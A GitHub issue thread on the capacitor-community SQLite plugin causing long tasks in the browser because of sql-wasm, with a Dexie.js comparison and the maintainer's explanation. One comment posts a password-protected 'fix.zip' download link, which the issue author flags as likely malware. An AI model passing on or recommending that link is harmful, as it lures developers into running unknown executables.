### ISSUE TITLE
This plugin creates "long tasks" when used on the web, even for simple sql

### ISSUE THREAD

**Issue by folsze** [capacitor-community/sqlite#579] opened 2024-08-27 21:45 UTC
On the web, when inspecting with slowdown CPU power, this plugin yields lots of long tasks, mainly due to sql-wasm usage. 

The CPU power I set to 20x slowdown in google chrome performance tab.

Check the profiler image, all the red tasks are slow and all of them mainly due to sql-wasm:

<img width="1728" alt="image" src="https://github.com/user-attachments/assets/6b3d755a-1317-46e1-819a-53477d2effc7">

All you need for reproducing this is cloning this repo:

https://github.com/jepiqueau/blog-tutorials-apps.git

Then run this project which I used in the above screenshot:
 and adding a new entity with the plus:

https://github.com/jepiqueau/blog-tutorials-apps/tree/main/SQLite/Part-1/ionic7-angular-sqlite-app

So my questions:
1. Am I correct with stating that this plugin is slow (on the web) ? I am testing out other similar simple websites with 20x CPU slowdown and they behave very fast still
2. is this known that it is that slow?
3. what can be done to make it faster? any settings in the sql-wasm?

Thanks for any info you can provide :)

**Comment by Vomgnar** [comment] 2024-08-28 05:06
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by folsze** [comment] 2024-08-28 05:16
⛔️ Please do not click the link above, it's likely malware ⛔️

> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

Hey I reported your comment. Please explain how this should be relevant to the issue if you really think it's not malware or anything.

**Comment by folsze** [comment] 2024-08-28 06:47
I am now comparing the performance with a Dexie.js sample app and with Dexie.js there are no "long tasks" happening, with the same 20x CPU slowdown:

<img width="1728" alt="image" src="https://github.com/user-attachments/assets/2582f3b0-f4bd-4db4-bfb5-1dbb9f7c27c8">

I used this example angular repo from here:

- https://github.com/dexie/Dexie.js?tab=readme-ov-file
-> from here: https://dexie.org/docs/Samples
-> from here: https://stackblitz.com/edit/angular-ivy-4666q1?file=src%2Fapp%2Fapp.module.ts
-> pasted the stackblitz-generated link into a new browser tab to inspect it: https://angular-ivy-4666q1.stackblitz.io/

**Comment by jepiqueau** [comment] 2024-09-22 14:24
@folsze 
As you mentioned, the plugin creates "long tasks," which is due to the sql-wasm.wasm file. Unfortunately, there isn’t much we can do about this since sql.js is currently the only solution designed specifically to run SQLite databases directly in the browser.

I also considered using better-sqlite3, which I use for the Electron plugin, but it is tailored for Node.js environments, allowing direct modifications to SQLite files on the server or local filesystem.

While Dexie.js can store data directly in IndexedDB, it doesn’t function as a SQLite database. Although one could potentially create a wrapper to bridge SQLite with Dexie, that falls well outside the scope of jeep-sqlite.

I hope this clarifies why jeep-sqlite was designed this way. We do have to accept the limitations imposed by the WebAssembly file.

Thank you for your understanding. Since there isn’t anything further we can do, I will go ahead and close the issue.

**Closed by jepiqueau** 2024-09-22 14:24 UTC
Labels: needs: triage, bug/fix

**Comment by mustafa0x** [comment] 2024-09-22 14:42
Related thought: I know that absurd-sql achieved better performance than raw indexedDb. It does use sql-wasm if I understand correctly.

https://jlongster.com/future-sql-web#tradeoffs-what-tradeoffs
